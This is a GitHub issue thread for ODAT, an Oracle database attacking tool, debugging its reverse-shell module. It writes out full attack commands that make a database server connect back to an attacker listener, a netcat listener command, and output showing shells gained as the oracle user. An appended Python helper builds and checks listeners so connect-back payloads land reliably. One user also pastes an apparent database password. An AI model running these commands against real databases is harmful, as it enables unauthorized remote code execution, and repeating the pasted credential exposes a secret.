quentinhardy / odat

ODAT: Oracle Database Attacking Tool

Reverse shell problem #12

Closed reversebrain closed 8 years ago

reversebrain commented 8 years ago

First of all, thank you for your tool! I noticed a strange problem executing the dbmsscheduler module with the reverse shell parameter. When odat starts listening on a specified port, it doesn't match the port written in input after the IP but a random one.

quentinhardy commented 8 years ago

Yes. Very strange...

I have just tested the latest development version and the standalone version (v2.0) with the following command on a 12.1.0.2 database:

./odat.py dbmsscheduler  -s 192.168.56.2 -d ORCL -U $user -P $password --reverse-shell 192.168.56.1 65534

I have the following output:

[1] (192.168.56.102:1521): Try to give you a reverse shell from the 192.168.56.2 server
[+] The python reverse shell tries to connect to 192.168.56.1:65534
Listening on [0.0.0.0] (family 0, port 65534)
Connection from [192.168.56.2] port 65534 [tcp/*] accepted (family 2, sport 29247)
sh: no job control in this shell
sh-4.2$ id
id
uid=1000(oracle) gid=1000(oracle) groups=1000(oracle)

Here is the netstat output:

netstat -antp | grep 65534
tcp        0      0 192.168.56.1:65534     192.168.56.2:29247    ESTABLISHED 3654/nc

For me, the reverse shell is established on the 65534 local port (2nd parameter of --reverse-shell). I can't reproduce your problem.

Thank you in advance,

reversebrain commented 8 years ago

I'm using the development version with Oracle Instant Client 11.1. This is my command:

sudo ./odat.py dbmsscheduler -s 127.0.0.1 -p 9000 -d XE -U TESTER1 -P Token_Java_dev_hydrogen1 --reverse-shell 10.10.72.110 443

This is the output:

[1] (127.0.0.1:9000): Try to give you a reverse shell from the 127.0.0.1 server
[+] The python reverse shell tries to connect to 10.10.72.110:443
443: inverse host lookup failed: Unknown host
listening on [any] 56657 ...
[+] The Job is running

I can get the reverse shell only performing this:

sudo nc -lvp 443

In fact this is the output:

listening on [any] 443 ...
192.168.101.7: inverse host lookup failed: Unknown host
connect to [10.10.72.110] from (UNKNOWN) [192.168.101.7] 50991
sh: no job control in this shell
sh-4.1$
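The output above is the tell-tale of a listener argument problem: the line "443: inverse host lookup failed" shows the port value was handed to traditional netcat as a positional argument (which it resolves as a host name), while "listening on [any] 56657" shows it then bound an arbitrary port of its own choosing, so the job's connect-back to 10.10.72.110:443 had nothing to land on. The snippet below is an added example, not ODAT's code, of the two checks a practitioner would want around this failure mode: build the listener argv so the port is an explicit -p value, and verify the port actually bound (by parsing netcat's "listening on" line, or via getsockname on a socket bound directly) before telling the target where to connect. The netcat output strings are constructed from the lines in this thread; the function names and the listener address are illustrative assumptions.

```python
"""Verify that a reverse-shell listener is bound to the port that was requested.

Added example (not part of ODAT). Demonstrates:
  1. building a traditional-netcat listener argv with the port as an explicit
     -p argument (a bare positional port is treated as a host name and netcat
     then listens on a random port, the symptom reported in this issue);
  2. checking the port that was really bound, from netcat's own output or from
     a socket we bind ourselves, and refusing to hand the target a mismatch.
"""
import re
import socket

# Constructed samples modelled on the netcat lines quoted in this thread.
GOOD_NC_OUTPUT = "listening on [any] 443 ...\n"
BAD_NC_OUTPUT = ("443: inverse host lookup failed: Unknown host\n"
                 "listening on [any] 56657 ...\n")

LISTEN_RE = re.compile(r"listening on \[[^\]]*\] (\d+)")


def build_nc_listener_argv(port: int) -> list:
    """argv for a traditional-netcat listener.

    The port must follow -p. Given as a bare positional argument, traditional
    nc interprets it as a remote host to filter on and picks its own port.
    """
    if not 1 <= port <= 65535:
        raise ValueError("port out of range: %r" % port)
    return ["nc", "-l", "-v", "-p", str(port)]


def bound_port_from_nc_output(output: str):
    """Return the port netcat reports in its 'listening on [...] N' line, or None."""
    m = LISTEN_RE.search(output)
    return int(m.group(1)) if m else None


def listener_port_ok(requested: int, output: str) -> bool:
    """True only if netcat reports listening on the port we asked for."""
    return bound_port_from_nc_output(output) == requested


def bind_listener(host: str, port: int) -> tuple:
    """Bind a TCP listener ourselves and return (socket, actual_port).

    Port 0 asks the kernel for an ephemeral port, which reproduces the 'random
    port' symptom; the caller must compare actual_port with what the reverse
    shell will be told to connect to.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen(1)
    return s, s.getsockname()[1]


def reverse_shell_target(listener_ip: str, requested: int, actual: int) -> str:
    """The 'ip:port' to give the job; refuse on a mismatch so the payload never
    dials a port that nobody is listening on."""
    if requested != actual:
        raise RuntimeError("listener bound to %d, not the requested %d"
                           % (actual, requested))
    return "%s:%d" % (listener_ip, requested)


if __name__ == "__main__":
    print(build_nc_listener_argv(443))
    print("good output ok:", listener_port_ok(443, GOOD_NC_OUTPUT))
    print("bad output ok: ", listener_port_ok(443, BAD_NC_OUTPUT))
    sock, port = bind_listener("127.0.0.1", 0)   # illustrative local bind
    print("kernel chose ephemeral port", port)
    sock.close()
```

Run stand-alone it prints the correct argv, reports the good sample as matching and the bad sample as not, and shows the ephemeral port a port-0 bind yields. The useful habit is the last function: compare the port the listener really holds with the port baked into the connect-back payload before the job is submitted, since the database will happily run a job that connects to nothing.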

quentinhardy commented 8 years ago

The following commit should fix this issue: 1fb920e0ad56a36f8d1ca40a642225a273779895

Can you confirm?

reversebrain commented 8 years ago

Yes, I think that the problem is the -p parameter, which specifies the port to use.

EDIT: Yes, now it works. I retried the same commands and now it is listening on the correct port. Thank you.

quentinhardy commented 8 years ago

You're welcome. Thank you for this bug report.